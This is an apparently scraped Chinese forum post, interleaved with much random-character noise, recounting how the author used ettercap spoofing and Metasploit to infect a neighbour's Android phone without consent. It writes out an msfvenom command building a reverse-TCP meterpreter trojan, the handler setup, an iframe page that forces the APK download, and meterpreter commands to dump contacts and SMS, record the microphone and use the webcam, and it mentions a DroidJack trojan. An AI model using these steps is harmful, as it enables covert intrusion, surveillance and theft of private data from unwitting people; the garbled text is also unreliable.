metasploit+ettercap中间人攻击成功入侵邻居手机

admin · 发表于 2018-10-20 20:30:37

) @0 W" H5 i6 d+ B: J$ a+ F; E9 _ 五、msf+ettercap入侵邻居安卓手机 ( M( b; Z1 y% u; w! o+ l

3 y: B0 w+ B, z; @( l, z 首先启动msf 6 n! p% M- `0 P9 M- J( W

: H9 h9 W# A! p( n 先用kali生成一个安卓木马，如下命令： 3 n( ~" P! x4 I

6 c, d5 r+ R* H6 S Msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=44444 -o ~/Desktop/ribenav.apk - H8 I3 X+ b6 Z6 n3 m

# A y5 ~. E$ s+ z 为了能让对方下载以后安装我这里将马的名字命名为ribenav.apk,哈哈邻居可是个“大色鬼”，就不适用替换下载的方法了，据我所知，邻居频繁使用手机浏览器浏览新闻 1 P2 j- a( T9 U1 ?8 |" p7 x, V# q

! u- O5 g6 \+ a8 c U, h 然后进入msf - N5 t: w5 H( I6 l# W2 B( T4 Q

7 g9 X+ R# Z4 }, U use exploit/multi/handler ) ]9 d; C- H: D% e O+ _# N4 H" _

" J/ J0 h4 l% |5 {& ^- m9 I/ f0 v set payload android/meterpreter/reverse_tcp + D: X8 f1 g5 _7 o8 W5 {% f

x9 m) t k7 A% R, e6 N set LHOST 192.168.0.109 //ip为kaili的ip $ x, u5 R( k! r# x: ~- ^4 Y

0 G0 I$ Y- @8 R2 n8 g* @1 D set LPORT 44444 //端口一定要与前面生成的木马的端口一致 3 ~( K+ n: U2 S

$ T, Q0 Y& G* v3 @5 f3 K Exploit T+ B5 F7 Q8 P! g7 X; C3 x

2 r* _. p( D" Q- t1 R! ~4 T " Y; D( P5 j4 x$ l: z

6 e1 F4 S+ O; g9 R* n+ Y. x 下面我们开启ettercap -G ; n- W- v% U' @; I: u; c' ]

4 ], `' p9 U! H. F5 z 我物理IP为 : H3 m" N% Z% j1 Q$ x

# L2 N% @+ [: s z# ?( g $ Q( T }1 `$ Q$ t

% m$ |1 F6 |1 p/ b" `1 V+ } 别到时候再把我物理机欺骗了，之前测试物理机只装腾讯管家是可以成功欺骗的， ! w% y, f; q6 ~7 I7 Q& D

" M0 Q7 Y0 F' g- v0 y" h5 j3 w 下面我们来设置一下 I5 N; l2 P8 T- ?" g

; m" U e `5 \6 t9 e 0 R: E9 \2 ~2 y" o% m( |) s

; `+ d3 }9 O7 y: o; [ 在开启欺骗之前我们先把生成的apk马丢到kaili var/www/html下，并创建一个index.htm文件内容为：<iframe src=http://192.168.0.109/ribenav.apk></iframe>,因为apk文件嘛要想直接提示下载，用iframe语句就OK了， $ n+ V! y$ n j# D2 Y

# T b) P5 Q, O- k 0 P5 D" @1 A H% n0 u+ U

. l Y9 x* F( y % o: L3 A" y- Z' K# h

6 {0 @" F/ \& y' P& n4 @! l& }" j * ^6 }3 \& k* R

2 e# q( ~3 `$ c# H + H; G( k) v! e" s/ K$ O: b

4 n8 F! R9 h+ m 8 x+ e+ g v5 f* ^; E V

& T5 ?1 ^% |4 _0 J' ]- u) b V ) E% v& r* B' X3 m' }

, z/ ^" q& c: _4 u, s+ J # z- |7 p: c# |# N5 G2 z( H9 L

7 P4 J. o3 D6 p4 D# O5 s7 z' y 1 Y; u; R3 C8 z9 b! B

* i Z1 \( Q, o/ q: r/ k9 ? " n6 n0 w4 V! C! T M

* f. Y, _1 Q/ o" O # x* e3 X s; H# x

8 j6 I: a* _( @5 I. ~+ [6 P + [& @+ v; |2 r2 x+ C( W

( |7 B7 l. M4 v4 A 2 G, Y' r1 q w/ o" F% l" B

: _7 u/ ]! D r" J* q6 ?7 l 7 n, T+ o) J1 E9 a! J

5 p `. J% k! s J4 q) M) l 下面我们开始攻击 2 J @' k2 a Y( J1 ^

" X/ N1 |' B' P7 B* |+ O# Z 5 C" k$ g# h$ A( m$ _9 |

- m5 L& K9 F# _; R! F, x2 O; r: z : x: D; T1 k4 T7 \6 o

. J4 X. ~5 r# P7 m9 H ; b1 b; ?2 b9 a- \8 \

2 a4 c2 i e) c, `$ z, T; Y : t8 A5 {, P# B% N; D

+ Y2 s% W3 U. C* ~4 E/ k0 y 5 C( F4 ? _6 w, }# P- {# ?) w

. P1 b7 ?# H! B4 T/ R 大概过了5分钟多，发现反弹成功了 ; M- ?- O% p$ x! B R0 w

' N3 D7 {4 X f1 _# j ' j+ K" k% A8 E6 W% h, X" m7 @+ v

& @( r/ n* g+ Y/ ]% o, K W % x! q, N9 U+ C

, w4 n9 t8 R2 e% @- g 0 y# a: ^7 S @/ @# l3 n D: d

5 H( y* _& `+ U. J 7 ~, a, D6 L3 F6 W* I' G) ^

# n' {$ L& C3 S+ ?2 H, p: k * ]# C: ~2 @: S* L7 k5 |) x

% l( F1 }; \1 U0 P l& A( b! o: X& Z1 d; j9 x

7 B" P& o% e; g, A, l- M, D% p ! Y3 x% B7 E. m

& d0 m/ M- q1 s b/ s 执行命令 9 d/ g2 F' w7 o" ^( i0 y

7 v1 S2 S! T0 p4 [3 O 6 c, d+ b, ~+ Y' d- p- S

1 E+ T7 v" G6 j0 i dump_contacts --》这个是导出电话 7 E: t+ u# S9 v2 ^7 @# G

: u, F6 A8 ^& b, ^; ?' |$ J* K- U/ e dump_sms --》这个是导出信息 ) r O- n3 ~" _- w8 ^) ^$ b

, k" J5 `1 c) J) I4 L# x) S record_mic Record audio from the default microphone for X seconds % I0 K: a- r# ?9 H8 X2 N- K

6 q$ U O6 \+ a# E0 i& Z9 {- o$ Y webcam_chat Start a video chat 2 p q2 ] Y9 W

4 @# L, R O7 I+ _" H7 q) @( J( v" @ webcam_list List webcams / |: K( m3 K1 C

2 h( ^0 g" }4 N6 w3 }* F2 g webcam_snap Take a snapshot from the specified webcam + q+ R. e9 t+ G- ^4 o0 ?; J

" C" h f2 \4 [& S; K- |; { webcam_stream lay a video stream from the specified webcam 9 {" [# o0 a0 ]+ v3 k- R' m. {

. i0 ]: v' Q H9 R% l5 D & d4 g6 r+ ^; h4 G) `7 s

. M+ l) z& O1 h$ m/ s 6 q9 {, Z* r2 F/ Y9 {" G7 H$ V

/ _6 F& G9 o0 j4 x* M 我们打开看一下电话薄， $ U0 g2 R3 k3 s

# s+ j# U# P" Z( @ 4 K! s P, @+ K; W( k

/ _; W6 [8 I+ G 3 |0 Z) h& T2 `0 f8 _. L

# u+ `$ j7 [$ Y ' }+ j4 ]3 u+ F- X- A! `8 g

# Z: _0 c, |% U: p1 \ 2 [% \& Z7 J. W3 c U" d7 \

9 f0 x; V# o& s e& J8 L+ J+ T5 {2 p! s! x+ f$ C

" C. H' e; p" Y - O( ^# s+ A" N/ Y- }

, Z. G1 n# M' Z/ C* j3 `- R 我们同时欺骗成DroidJack木马，使用方法如图： K- |/ M F' |7 j; ~% f9 l

9 w8 {+ U! S: [0 v6 J) s8 G4 ] { / Y4 \ G$ z5 l2 b5 r4 |+ |

6 V b9 k- a6 Z8 z, l ' N# i2 j2 D2 f

% \: P! H' `# h$ V4 u7 e% P! D/ ] ' ?0 }" `& N. ^0 d

6 o0 V+ \! C g7 L9 p7 g/ G9 U 切记在前面生成完马以后记得在这里选择开关为on，并且对应前面生成马的时候的端口 6 k' \4 b$ I( _7 X+ ~8 `; J+ \

5 V2 {9 L! e& p 0 u! h: W1 ?+ B$ J0 F# Z _

1 w u U& y4 ?0 ? ; S2 g7 z' o* N" m, o! q. i. _

- H. V. y0 b; U" o2 c- m- J @ & t9 T: G4 e/ f5 A( C6 T

" T6 i/ Q& Y- E1 l( z# [! j) m8 B 1 `' Q; c5 g. U4 Q7 C k R7 n4 O

6 M+ f$ b' f( p, Y5 h9 q
: y& q% V' H# m8 k' D! `( ?' ]

		自动登录	找回密码
密码			立即注册